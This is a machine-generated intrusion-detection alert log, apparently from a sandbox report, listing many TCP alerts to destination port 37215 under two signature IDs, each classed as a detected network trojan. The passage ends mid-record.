              Timestamp:05/24/24-10:59:38.530880
              SID:2829579
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535287
              SID:2829579
              Source Port:40578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.585650
              SID:2835222
              Source Port:40790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119399
              SID:2835222
              Source Port:38394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483437
              SID:2829579
              Source Port:45470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279443
              SID:2835222
              Source Port:58846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249878
              SID:2829579
              Source Port:40836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041150
              SID:2835222
              Source Port:54028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575541
              SID:2829579
              Source Port:41986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232665
              SID:2835222
              Source Port:52438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554357
              SID:2835222
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424170
              SID:2829579
              Source Port:59558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349840
              SID:2829579
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926578
              SID:2829579
              Source Port:48500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396684
              SID:2829579
              Source Port:60576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.993875
              SID:2835222
              Source Port:55380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492451
              SID:2835222
              Source Port:37442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066191
              SID:2829579
              Source Port:54362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235324
              SID:2829579
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187998
              SID:2835222
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484470
              SID:2829579
              Source Port:51528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396561
              SID:2835222
              Source Port:60022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429715
              SID:2829579
              Source Port:50752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575727
              SID:2835222
              Source Port:41278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347551
              SID:2835222
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579546
              SID:2835222
              Source Port:33926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372573
              SID:2829579
              Source Port:34018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128594
              SID:2835222
              Source Port:60308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574102
              SID:2829579
              Source Port:58678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882541
              SID:2835222
              Source Port:35382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232772
              SID:2835222
              Source Port:55390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449958
              SID:2829579
              Source Port:57012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873801
              SID:2835222
              Source Port:55352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624353
              SID:2829579
              Source Port:56118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457905
              SID:2829579
              Source Port:45158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488248
              SID:2835222
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374516
              SID:2835222
              Source Port:34554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833164
              SID:2829579
              Source Port:37258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111185
              SID:2835222
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053281
              SID:2829579
              Source Port:46684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154149
              SID:2829579
              Source Port:52856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545151
              SID:2829579
              Source Port:50420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570634
              SID:2829579
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503623
              SID:2829579
              Source Port:53390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695052
              SID:2835222
              Source Port:34458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125505
              SID:2829579
              Source Port:55308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535362
              SID:2829579
              Source Port:52798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662571
              SID:2835222
              Source Port:56600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592052
              SID:2835222
              Source Port:53656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368443
              SID:2829579
              Source Port:35444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432431
              SID:2835222
              Source Port:37744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546925
              SID:2829579
              Source Port:52962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467851
              SID:2835222
              Source Port:50492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.105015
              SID:2829579
              Source Port:52964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284105
              SID:2835222
              Source Port:34754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926185
              SID:2829579
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503697
              SID:2829579
              Source Port:51574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249672
              SID:2835222
              Source Port:53944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332230
              SID:2835222
              Source Port:49330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148591
              SID:2829579
              Source Port:53188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664495
              SID:2829579
              Source Port:38204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554329
              SID:2835222
              Source Port:36392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926896
              SID:2829579
              Source Port:48776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870275
              SID:2829579
              Source Port:44956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061340
              SID:2829579
              Source Port:42728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074016
              SID:2829579
              Source Port:35014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534450
              SID:2829579
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128595
              SID:2829579
              Source Port:50390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078052
              SID:2829579
              Source Port:38640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165223
              SID:2835222
              Source Port:55282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599072
              SID:2829579
              Source Port:59732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188638
              SID:2835222
              Source Port:50020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727939
              SID:2829579
              Source Port:34670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551858
              SID:2835222
              Source Port:51868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169660
              SID:2835222
              Source Port:47300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478366
              SID:2835222
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578021
              SID:2829579
              Source Port:53738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201231
              SID:2835222
              Source Port:34950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2829579
              Source Port:37256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663611
              SID:2829579
              Source Port:50924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167323
              SID:2835222
              Source Port:58474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168069
              SID:2829579
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516355
              SID:2835222
              Source Port:47776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989557
              SID:2829579
              Source Port:34476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.385496
              SID:2835222
              Source Port:56906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391555
              SID:2835222
              Source Port:52794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303438
              SID:2835222
              Source Port:46662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623693
              SID:2829579
              Source Port:37712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157077
              SID:2829579
              Source Port:49670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601385
              SID:2829579
              Source Port:40828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327837
              SID:2829579
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124224
              SID:2835222
              Source Port:46114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198784
              SID:2835222
              Source Port:41828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198651
              SID:2829579
              Source Port:53888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741690
              SID:2835222
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578802
              SID:2835222
              Source Port:52786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492382
              SID:2835222
              Source Port:49196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060875
              SID:2829579
              Source Port:39650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118692
              SID:2835222
              Source Port:57652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329797
              SID:2829579
              Source Port:53502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882402
              SID:2829579
              Source Port:42132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053175
              SID:2835222
              Source Port:48930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358438
              SID:2835222
              Source Port:45482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055712
              SID:2835222
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607572
              SID:2835222
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355187
              SID:2829579
              Source Port:52568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725114
              SID:2835222
              Source Port:52724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.993804
              SID:2829579
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520160
              SID:2835222
              Source Port:37044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526849
              SID:2829579
              Source Port:54554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570638
              SID:2835222
              Source Port:57210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451183
              SID:2829579
              Source Port:43478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.102283
              SID:2835222
              Source Port:50874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062258
              SID:2829579
              Source Port:37698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458359
              SID:2835222
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397735
              SID:2829579
              Source Port:57970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574415
              SID:2829579
              Source Port:47110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.765055
              SID:2835222
              Source Port:45878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057508
              SID:2829579
              Source Port:55286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575294
              SID:2835222
              Source Port:37870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408078
              SID:2835222
              Source Port:56868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458376
              SID:2829579
              Source Port:40864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864836
              SID:2829579
              Source Port:44582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233935
              SID:2829579
              Source Port:48274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.767083
              SID:2835222
              Source Port:57012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194453
              SID:2829579
              Source Port:49300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368584
              SID:2829579
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063753
              SID:2829579
              Source Port:55966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858423
              SID:2829579
              Source Port:48670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629616
              SID:2835222
              Source Port:35766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624800
              SID:2829579
              Source Port:59354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108608
              SID:2835222
              Source Port:37420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102603
              SID:2829579
              Source Port:49840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542323
              SID:2835222
              Source Port:53308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055341
              SID:2829579
              Source Port:60294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453749
              SID:2829579
              Source Port:34810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572644
              SID:2829579
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233710
              SID:2829579
              Source Port:34254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348062
              SID:2829579
              Source Port:37476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579669
              SID:2835222
              Source Port:38370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637751
              SID:2829579
              Source Port:51092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459472
              SID:2829579
              Source Port:58402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550514
              SID:2829579
              Source Port:47488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102254
              SID:2829579
              Source Port:60052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124083
              SID:2835222
              Source Port:47902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154866
              SID:2829579
              Source Port:42686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540630
              SID:2835222
              Source Port:47318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452010
              SID:2829579
              Source Port:60730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926084
              SID:2835222
              Source Port:45364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187063
              SID:2829579
              Source Port:46876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490970
              SID:2829579
              Source Port:45806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550632
              SID:2835222
              Source Port:55200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447185
              SID:2835222
              Source Port:43276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249778
              SID:2829579
              Source Port:56546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098934
              SID:2829579
              Source Port:59852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738918
              SID:2829579
              Source Port:45884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631770
              SID:2835222
              Source Port:46288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976862
              SID:2835222
              Source Port:59858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308845
              SID:2835222
              Source Port:44750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538731
              SID:2835222
              Source Port:44032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456393
              SID:2835222
              Source Port:37532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166872
              SID:2829579
              Source Port:55794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200566
              SID:2829579
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289080
              SID:2829579
              Source Port:57194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062748
              SID:2829579
              Source Port:54030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231827
              SID:2829579
              Source Port:55300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725986
              SID:2835222
              Source Port:56592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976910
              SID:2835222
              Source Port:51178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195287
              SID:2835222
              Source Port:53110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882693
              SID:2835222
              Source Port:39694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246585
              SID:2835222
              Source Port:56196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750079
              SID:2829579
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573388
              SID:2835222
              Source Port:59352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681297
              SID:2829579
              Source Port:47572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155055
              SID:2829579
              Source Port:35566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377438
              SID:2829579
              Source Port:53714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574541
              SID:2835222
              Source Port:43866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079851
              SID:2829579
              Source Port:42542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289116
              SID:2835222
              Source Port:41548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374837
              SID:2835222
              Source Port:51120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970839
              SID:2835222
              Source Port:36988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457004
              SID:2835222
              Source Port:44832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485140
              SID:2829579
              Source Port:47888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148624
              SID:2835222
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545510
              SID:2829579
              Source Port:60590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200610
              SID:2835222
              Source Port:38674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545322
              SID:2829579
              Source Port:37042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764894
              SID:2829579
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157642
              SID:2829579
              Source Port:47418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441327
              SID:2829579
              Source Port:48938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053646
              SID:2829579
              Source Port:50956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449973
              SID:2835222
              Source Port:33326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252511
              SID:2829579
              Source Port:40020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749825
              SID:2835222
              Source Port:53860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634797
              SID:2835222
              Source Port:34060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477815
              SID:2835222
              Source Port:57878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372065
              SID:2829579
              Source Port:53714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048603
